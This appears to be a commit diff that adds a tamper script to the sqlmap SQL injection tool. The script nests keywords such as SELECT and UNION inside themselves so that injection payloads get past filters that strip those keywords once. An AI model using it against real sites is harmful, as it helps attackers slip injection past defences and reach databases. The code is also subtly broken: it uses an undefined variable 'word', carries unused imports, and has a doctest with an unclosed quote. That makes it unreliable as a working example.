Added a tamper script (unstripkeywords)

2025-07-27 08:30:10 +03:00 · 2020-01-02 18:36:41 +01:00 · 2020-01-02 18:36:41 +01:00 · d6f4e2adbe
commit d6f4e2adbe
parent 8ace3363bd
1 changed files with 45 additions and 0 deletions
--- a/tamper/unstripkeywords.py
+++ b/tamper/unstripkeywords.py
@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from re import finditer, search
+from os import environ
+from math import ceil, floor
+from lib.core.compat import xrange
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Transforms keywords ('SELECT') so they are valid when stripped once ('SELSELECTECT')
+
+    Tested against:
+        * MySQL 5.7
+
+    Notes:
+        * Useful to bypass weak filters based on keywords stripping.
+
+    >>> tamper('SELECT id FROM users UNION SELECT NULL')
+    'SELSELECTECT id FROM users UNUNIONION SELSELECTECT NULL
+    """
+
+    retVal = payload
+    keywords = ['SELECT', 'UNION', 'WHERE', 'SUBSTR'];
+
+    if 'UNSTRIP_KEYWORDS' in environ:
+        keywords = environ['UNSTRIP_KEYWORDS'].upper().split(',')
+
+    if payload:
+        for keyword in keywords:
+            if keyword in payload and search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None:
+                retVal = retVal.replace(word, word[:int(floor(len(word)/2))] + word + word[int(ceil(len(word)/2)):])
+
+    return retVal